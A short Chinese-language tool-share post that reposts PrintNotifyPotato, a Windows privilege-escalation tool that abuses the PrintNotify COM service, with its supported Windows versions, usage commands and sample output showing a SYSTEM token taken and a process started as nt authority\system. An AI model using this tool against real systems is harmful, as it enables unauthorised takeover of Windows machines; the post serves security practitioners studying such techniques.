打印相关权限信息工具，可用于windows权限提升——PrintNotifyPotato

作者：Sec-Labs | 发布时间：2022-12-02 18:11:21

项目地址

https://github.com/BeichenDream/PrintNotifyPotato

PrintNotifyPotato

通过PrintNotify COM服务提升权限

支持Windows 10 - 11 Windows Server 2012 - 2022

cffe95d339181045

Usege

C:\Windows\Temp >PrintNotifyPotato.exe

aaaa    aaa                           aaa
 aaaa    aaa                           aaa
 aaaa    aaa                           aaa
 aaaa    aaa                           aaa
 aaaa    aaa                           aaa
 aaaa    aaa                           aaa
 aaaa    aaa    aaaaaaa     aaaaaaa    aaa   aaaa
 aaaaaaaaaaa   aaaaaaaaa   aaaaaaaaa   aaa  aaaa
 aaaaaaaaaaa  aaaa   aaa  aaaa   aaaa  aaa aaaa
 aaaa    aaa         aaa  aaaa   aaaa  aaaaaaa
 aaaa    aaa     aaaaaaa  aaa          aaaaaaa
 aaaa    aaa   aaaaaaaaa  aaa          aaaaaaaa
 aaaa    aaa  aaaa   aaa  aaa     aaa  aaaa aaa
 aaaa    aaa  aaa   aaaa  aaaa   aaaa  aaa  aaaa
 aaaa    aaa  aaa  aaaaa   aaaa  aaaa  aaa   aaaa
 aaaa    aaa  aaaaaaaaaa    aaaaaaaa   aaa    aaa
 aaaa    aaa    aaaa aaaa    aaaaa     aaa    aaaa

Github: https://github.com/BeichenDream/PrintNotifyPotato

Example:
            PrintNotifyPotato.exe whoami
            PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe  whoami

[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >

Reference/Thanks

http://code.google.com/p/google-security-research/issues/detail?id=128

zcgonvh

https://github.com/antonioCoco/JuicyPotatoNG

https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/

标签：工具分享